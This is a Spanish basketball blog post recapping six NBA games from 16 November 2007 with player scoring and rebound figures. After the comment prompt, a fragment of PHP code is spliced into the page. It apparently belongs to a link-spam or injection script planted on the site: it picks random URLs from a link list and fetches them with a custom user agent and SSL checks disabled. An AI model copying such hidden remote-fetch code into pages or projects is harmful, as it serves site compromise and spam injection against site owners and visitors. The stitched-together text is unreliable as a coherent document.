La Crónica (16/11/07) 2ª parte

18 de November de 2007 por xapa_croack

 Segunda parte de la crónica del viernes en la que destacamos el enorme partido de Lebron James, que poco a poco encuentra su mejor estado de forma, una nueva derrota de Memphis a pesar del partidazo de Juan Carlos Navarro, records personales de David West y Kevin Martin, el renacer de Arenas y la primera victoria de los Warrios esta temporada.

Jazz 94 – Cavaliers 99
Lebron James volvió a dar un recital de baloncesto para dominar el encuentro, aportando 34 puntos de los 40 puntos de su equipo en la segunda parte y recordando al jugador que maravilló al final de la temporada pasada. Además se quedó a una asistencia del triple doble con 40 puntos, incluyendo 4 tiros libres en los últimos tres segundos del partido junto con 10 rebotes y 9 asistencias fueron sus credenciales. En la pintura también estuvo genial Zidrunas Ilgauskas que contribuyó con 17 puntos, 12 rebotes y 6 tapones.
Por los Jazz, que siguen siendo los líderes de la Northwest, Carlos Boozer estuvo muy solitario ante su ex-equipo con 26 puntos y 11 rebotes.

Hornets 120 – Grizzlies 118
New Horleans sigue siendo la sensación del oeste y consigue su mejor arranque liguero. Esta noche fué gracias a David West que con su record personal de 40 puntos batió a unos peleones Grizzlies, metiendo además todos los puntos de su equipo en la prorroga.
El líder de asistencias de la liga, Chis Paul, no defraudó y contribuyó con 29 puntos y 13 asistencias. Chandler con 17 rebotes ganó la partida reboteadora a los Memphis.
Navarro lideró a los suyos con 28 puntos y un porcentaje excelente de tiros triples con 8 de 9 intentos, presentandose así a la liga y empatando con Kidd y Duhon como los novatos que mas triples metieron en un partido. Gay y Gasol aportaron 20 puntos que no fueron suficientes para que cayera la victoria del bando local.

Rockets 84 – Spurs 90
Los Spurs recuperaron el average particular en el duelo tejano, ya que hace 10 dias perdieron 81-89. Duncan volvió a coger el hilo y los de San Antonio lo agradecieron. La baja de T-Mac también contribuyó. Tim Duncan acabó con 25 puntos y 13 rebotes y “Manudo” Ginobili añadió 19 puntos 9 rebotes y 7 asistencias , camino de ser el mejor sexto hombre de la liga. Esta vez entró en la terna Finley que con su 7 de 8 en tiros de campo tiró por tierra todas las esperanzas de los Rockets, que tuvieron en el argentino Luis Alberto Scola el mejor hombre de su equipo con 20 puntos y gran porcentaje de tiros de campo 10 de 11, motivándose ante el equipo que retenía sus derechos antes de llegar la NBA y pidiendo un hueco en el quinteto inicial. La baja de T-Mac la suplió Bonzi Wells con un pauperrimo 1 de 9 en tiros de campo. El chino Ming Yao acabó con 14 puntos y 9 rebotes.

Wizards 105 – Timberwolves 89
Los capitalinos siguen con su buena racha y se alzan con su tercera victoria consecutiva y tercera de la liga después de “recuperar” en juego a su estrella Gilbert Arenas, que anotó 27 puntos y 8 asistencias zanjando de esta manera su horrible comienzo de temporada regular. En el partido estuvo secundado por Caron Butler con 29 puntos y 8 rebotes. Mas flojo estuvo Jamison, esta vez, que se quedó en 14 puntos y 5 rebotes. El máximo reboteador del partido con 11 fué para Haywood que le ganó la partida a Al Jefferson con uno menos. Un parcial de 14-2 en el tecer cuarto acabó con las esperanzas de los locales.
El liderazgo de los jovenes Wolves volvió a estar en Rashad Mc Cants con 19 puntos. Minesota tendrá que mejorar sustancialmente si quiere hacer algo. De momento se quedan últimos del salvaje oeste.

Knicks 118 – Kings 123
Tercer partido de la gira del oeste de los neoyorkinos y tercera derrota, esta más dolorosa ya que tuvieron que pasar 2 prorrogas para que se decidiera el ganador del encuentro de dos equipos en horas bajas. Kevin Martin con 43 puntos, record de su corta carrera, 11 de ellos en los dos tiempos extra, lideró a los californianos bien secundado por Ron Artest en su segundo partido con 28 puntos, aunque fatal desde la línea de tiros libres 4/11 que hubieran dado la victoria anteriormente. Por parte de los de la gran manzana destacaron Eddy Curry con 27 puntos y 10 rebotes y el blanquito David Lee 24 y 16.

Clippers 105 – Warriors 122
Primera victoria de los Warriors en la presente temporada, basada en el gran dominio de la pintura y los rápidos contraataques que tan famosos se hicieron en los Play Off pasados. El letón Biedrins se erigió el mejor con 23 puntos y 18 rebotes, Al Harrington contribuyó de manera sustancial con sus 25 puntos y 8 rebotes y la manija la llevó a la perfección Baron Davis gracias a sus 21 puntos, 12 asistencias y 5 tapones, su record personal, motivado quizás por tener a su abuela en la grada. Patrick O´ Bryant suplió con solvencia los minutos que Biedrins estaba en el banco cargado de faltas. En el próximo encuentro el domingo frente a Toronto ya podrá volver a las canchas Stephen Jackson. Por parte angelina destacaron la tripleta Thomas 25 puntos, Kaman 20 puntos y 12 rebotes y Maggette 22 puntos, 12 rebotes y 5 asitencias.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>